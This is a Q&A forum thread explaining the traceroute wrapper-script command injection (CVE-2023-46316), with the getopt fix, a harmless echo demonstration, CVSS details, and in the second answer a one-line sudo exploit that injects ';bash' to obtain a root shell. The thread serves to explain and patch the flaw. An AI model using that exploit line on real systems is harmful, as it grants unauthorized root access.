# What exactly traceroute's "CVE-2023-46316" is?

Tags: 20.04, security, vulnerability, traceroute

As description in CVE-2023-46316: In buc Traceroute 2.0.12 through 2.1.2 before 2.1.3, the wrapper scripts do not properly parse command lines.

I'm wondering how the attacker infiltrated the system ?
Can anyone explain it to me ? Thanks

Comment: It’s related to allowing command injection from external wrapper scripts that might be used for gaining and escalating privileges, but a wrapper script has to be implemented by you first locally, so not a remote vulnerability in the first place anyway and thus very low threat for a normal desktop user … See for example https://medium.com/@shay_62828/shell-command-injection-through-traceroute-npm-package-a4cf7b6553e3

Answer (score 3, accepted):

That is a valid question IMO, since I've been searching the internet for a few hours on what exactly could happen before [CVE-2023-46316](https://ubuntu.com/security/CVE-2023-46316) gets fixed, how it could've happened and how exactly does the fix work, but I found nothing ... So, I looked into [the source](https://sourceforge.net/projects/traceroute/files/traceroute/) and particularly into the wrapper scripts included under `traceroute-2.1.3/wrappers/` and the other older version `traceroute-2.1.1/wrappers/` (after extracting the compressed downloaded archives) ... and as far as I could tell, the only difference is in one line from this:

```
PARSED=`getopt 'adnruvAMOPQU$w:S:m:p:q:g:t:s:I:f:T:' "$@"`
```

to this:

```
PARSED=`getopt -- 'adnruvAMOPQU$w:S:m:p:q:g:t:s:I:f:T:' "$@"`
```

... i.e. the addition of `--` which makes sense as there exists after that line, this line:

```
eval set -- "$PARSED"
```

Let's make it simple with a shortened example demonstration, first before the fix:

```
$ PARSED=`getopt 'n:' "-n 127.0.0.1; echo command injected"`
$
$ eval set -- "$PARSED"
command injected --
$
$ echo "$PARSED"
 -n  127.0.0.1; echo command injected --
$
$ echo "$@"
127.0.0.1
```

... as you see, the command injection worked and `echo command injected` was executed.

Then, after the fix:

```
$ PARSED=`getopt -- 'n:' "-n 127.0.0.1; echo command injected"`
$
$ eval set -- "$PARSED"
$
$ echo "$PARSED"
 -n ' 127.0.0.1; echo command injected' --
$
$ echo "$@"
 127.0.0.1; echo command injected --
```

... and the command injection doesn't work anymore and the command-line options are better parsed.

Answer (score 1):

In Traceroute 2.0.12 through to 2.1.2 (fixed in 2.1.3), the wrapper scripts mishandle shell metacharacters, which can lead to privilege escalation if the wrapper scripts are executed via sudo. The affected wrapper scripts are: `tcptraceroute`, `tracepath`, `traceproto` and `traceroute-nanog`.

Additional infomation:
CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N - 7.3 (High)

A local privilege escalation was identified in wrapper scripts provided by [the Traceroute for Linux package](https://sourceforge.net/projects/traceroute/). The wrapper scripts do not properly sanitise the user's input, which is taken as parameters and passed into the traceroute command. The user can inject a semicolon (`;`) into any of the parameters of the affected wrappers, and the wrapper will treat the text following the semicolon as a new operating system command.

The scripts require the user to have raw socket access in order to function as intended. It is common for low-privilege users to be granted sudo root permissions to run the wrapper scripts as opposed to setting `cap_net_raw` capabilities to the binary, or through the use of "icmp dgram" sockets. Thus any user on the local machine can escalate their privileges to root, with the only Attack Requirements (AT in CVSS 4) being that they have sudo root permissions to execute the vulnerable wrapper scripts.

The vulnerable wrapper scripts have been provided since version 2.0.12. Distributions such as Debian 12, Fedora 38, Centos 8 and Amazon Linux 2 include these wrapper scripts with default installations.

Exploitation:

```
sudo tcptraceroute localhost ";bash"
```

and you will get your ROOT shell

Comment: Welcome to AskUbuntu! Thank you for improving your answer. The previous one was flagged by multiple users and bots; see AskUbuntu chat. Link-only answers are discouraged on the StackExchange network. Forgetting to say the link goes to your own blog is spam, while link-only answers are marked as not-an-answer. You generally ***paraphrase*** (and not copy unless you're the author as in this case) the ***relevant content into your answer body***. Anyway, here's an upvote for your expert opinion, for you to get started on AskUbuntu!